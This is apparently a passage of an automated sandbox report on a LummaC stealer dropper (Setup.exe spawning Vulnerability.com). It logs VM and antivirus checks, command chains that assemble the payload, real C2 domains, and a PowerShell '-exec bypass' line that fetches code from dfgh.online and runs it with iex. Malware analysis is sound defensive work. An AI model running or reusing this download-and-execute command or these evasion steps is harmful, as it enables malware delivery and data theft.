Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5281			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1599			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com TID: 6756	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com TID: 7060	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2436	Thread sleep count: 5281 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1812	Thread sleep count: 1599 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1352	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2884	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6176	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\Setup.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior

Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: powershell.exe, 00000011.00000002.2959195521.0000000007861000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: robinsharez.shop
Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: handscreamny.shop
Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: chipdonkeruz.shop
Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: versersleep.shop
Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: crowdwarek.shop
Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: apporholis.shop
Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: femalsabler.shop
Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: soundtappysk.shop
Source: Vulnerability.com, 0000000D.00000003.2474685444.0000000004AC7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: throwlette.cyou

Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Pro Pro.cmd & Pro.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 302164	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Hentai	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ENOUGH" Golf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 302164\Vulnerability.com + Tape + Naval + Offered + Rhode + Wiring + Tapes + Loc + Treasures + Determining + Tiny + Affects + Computing 302164\Vulnerability.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Achieved + ..\Indians + ..\Por + ..\Argentina + ..\Documentation + ..\Usda + ..\Standard + ..\Cdt v	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com Vulnerability.com v	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;			Jump to behavior

Source: Vulnerability.com, 0000000D.00000000.2095920123.0000000000803000.00000002.00000001.01000000.00000008.sdmp, Tiny.9.dr, Vulnerability.com.2.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
